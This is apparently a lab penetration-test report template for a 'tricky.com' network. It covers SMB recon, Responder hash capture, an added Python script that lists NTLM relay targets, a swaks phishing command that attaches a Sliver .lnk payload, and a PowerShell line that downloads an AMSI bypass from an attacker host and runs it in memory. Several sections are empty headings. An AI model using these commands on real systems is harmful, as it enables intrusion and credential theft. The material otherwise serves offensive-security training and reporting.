Detailed Findings and Recommendations
The scope of this penetration test was to identify and exploit vulnerabilities on the following set of IP addresses and to report the results.
| IPs |
|---|
| 172.16.240.150 |
| 192.168.240.159 |
| 172.16.240.151 |
| 172.16.240.152 |
| 172.16.240.155 |
Reconnaissance
RustScan
The initial RustScan results show a few open ports on the machine 192.168.240.159.
```
rustscan -a ips.txt --ulimit 5000 -- -Pn -sC -sV -oA network
Open 192.168.240.159:3389
Open 192.168.240.159:5985
Open 192.168.240.159:47001
Open 192.168.240.159:49665
Open 192.168.240.159:49666
Open 192.168.240.159:49664
Open 192.168.240.159:49667
Open 192.168.240.159:49668
Open 192.168.240.159:49669
Open 192.168.240.159:49670
Open 192.168.240.159:49671
Open 192.168.240.159:49672
```
The nmap service scan that RustScan hands off to also returned the host's NetBIOS name.

The other open ports do not seem to give much information that could be used to gain initial access to the system.
The RustScan results do not show port 445 as open, but to confirm this I ran CrackMapExec against the same target list, which shows that port 445 is indeed open.
```
cme smb ips.txt
SMB 192.168.240.159 445 MAIL01 [*] Windows 10.0 Build 17763 x64 (name:MAIL01) (domain:tricky.com) (signing:False) (SMBv1:False)
```
The output also shows that SMB signing is not required (signing:False). A host that does not enforce signing will accept relayed NTLM authentication, so MAIL01 is a valid target for poisoning and relay attacks. I started Responder to capture NTLM hashes:
```
sudo responder -I tun0
```
While waiting for the nmap results to finish I also checked port 80. Since RustScan had already missed port 445, I thought it would not hurt to check port 80 as well, and this indeed gave a useful result.
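Before moving on to the web server, here is an added example (not part of the original report or the tools it uses) that reconciles the two scan results above: it groups the RustScan "Open ip:port" lines per host, parses the CrackMapExec SMB banner line, flags hosts where cme sees 445 but the port scanner did not, and lists hosts with signing:False as relay candidates. The sample inputs are constructed from the output shown above; the second cme host (10.10.10.10, HOST02) is hypothetical and only present to show the signing-required case.

```python
"""Reconcile RustScan port lines with CrackMapExec SMB output.

Added example for this report, not part of the original engagement tooling.
The sample inputs below are constructed from the output shown above; the
second CME host (10.10.10.10, "HOST02") is hypothetical and only there to
show the signing-required case.
"""
import re
from collections import defaultdict

RUSTSCAN_OUTPUT = """\
Open 192.168.240.159:3389
Open 192.168.240.159:5985
Open 192.168.240.159:47001
Open 192.168.240.159:49664
"""

CME_OUTPUT = """\
SMB 192.168.240.159 445 MAIL01 [*] Windows 10.0 Build 17763 x64 (name:MAIL01) (domain:tricky.com) (signing:False) (SMBv1:False)
SMB 10.10.10.10 445 HOST02 [*] Windows 10.0 Build 17763 x64 (name:HOST02) (domain:tricky.com) (signing:True) (SMBv1:False)
"""

# RustScan greppable line: "Open <ip>:<port>"
RUSTSCAN_RE = re.compile(r"^Open\s+(\S+):(\d+)$")
# CrackMapExec SMB banner line as printed by `cme smb <targets>`
CME_SMB_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_rustscan(text):
    """Group 'Open ip:port' lines into {ip: sorted list of ports}."""
    ports = defaultdict(set)
    for line in text.splitlines():
        m = RUSTSCAN_RE.match(line.strip())
        if m:
            ports[m.group(1)].add(int(m.group(2)))
    return {ip: sorted(p) for ip, p in ports.items()}


def parse_cme_smb(text):
    """Parse CME SMB banner lines into {ip: {...}}; signing/smbv1 become bools."""
    hosts = {}
    for line in text.splitlines():
        m = CME_SMB_RE.match(line.strip())
        if m is None:
            continue  # not a banner line (e.g. progress or error output)
        hosts[m["ip"]] = {
            "port": int(m["port"]),
            "name": m["name"],
            "domain": m["domain"],
            "os": m["os"],
            "signing": m["signing"] == "True",
            "smbv1": m["smbv1"] == "True",
        }
    return hosts


def relay_targets(smb_hosts):
    """Hosts that do not require SMB signing: they accept relayed NTLM auth."""
    return sorted(ip for ip, info in smb_hosts.items() if not info["signing"])


def reconcile(rust_ports, smb_hosts):
    """Per SMB host: was 445 missed by the port scanner, and is it relayable?"""
    findings = []
    for ip, info in sorted(smb_hosts.items()):
        scanned = set(rust_ports.get(ip, []))
        findings.append({
            "ip": ip,
            "name": info["name"],
            "smb_missed_by_scanner": info["port"] not in scanned,
            "relay_candidate": not info["signing"],
        })
    return findings


def nmap_commands(rust_ports):
    """One targeted service scan per host, with the nmap flags used above."""
    return [
        f"nmap -Pn -sC -sV -p {','.join(map(str, ports))} {ip}"
        for ip, ports in sorted(rust_ports.items())
    ]


if __name__ == "__main__":
    rust = parse_rustscan(RUSTSCAN_OUTPUT)
    smb = parse_cme_smb(CME_OUTPUT)
    for finding in reconcile(rust, smb):
        print(finding)
    print("relay targets (for ntlmrelayx -tf):", relay_targets(smb))
    for cmd in nmap_commands(rust):
        print(cmd)
```

The reconciliation catches exactly the discrepancy noted above (cme reporting 445 while the port scanner did not), and `relay_targets` produces the list you would write to an ntlmrelayx targets file; a host reporting signing:True is dropped from it because it will reject the relayed session.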
```
curl http://192.168.240.159
<html>
<head>
<title>Tricky.com Mail system information</title>
</head>
<body>
<h1>Contact information</h1>
<p>Will@tricky.com serves in the clerks office for mail administration. You can mail him about issues with the mail system.</p>
<p>Note that due to security issues arising from malicious mails, we have implemented very good security on the clients, such as antivirus, application whitelisting and removed all Office products.</p>
</body>
</html>
```
After gathering this information, the most likely way to obtain initial access is to send a malicious email to the user Will, who handles mail-system issues and can be expected to open a file sent to him. The page also reveals that the clients have no Office products, run antivirus and enforce application whitelisting, so the payload has to work under those constraints.
Possible Payload Requirements
- It should bypass AV.
- It should bypass application whitelisting.
- It should work without office products.
Resource Development
Initial Compromise
```
swaks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.240.159 --header "Subject: Test Email" --body "This is a test email." --attach @./sliver64.lnk
```
```
migrate -p conhost.exe
```
(find the PID of conhost.exe first)
Client09 (172.16.240.155)

On Client09 the AMSI bypass (see the appendix) was fetched from 192.168.45.159 and executed in memory with IEX:
```powershell
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:80/amsi64.txt') | IEX
```
- UNC path: the same approach was used for both hosts, just swapping the IPs.
- WriteDACL over the mailadmins group was then used to add svcsql to the mailadmins group.
- Ligolo was then set up on mail09 for pivoting.
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |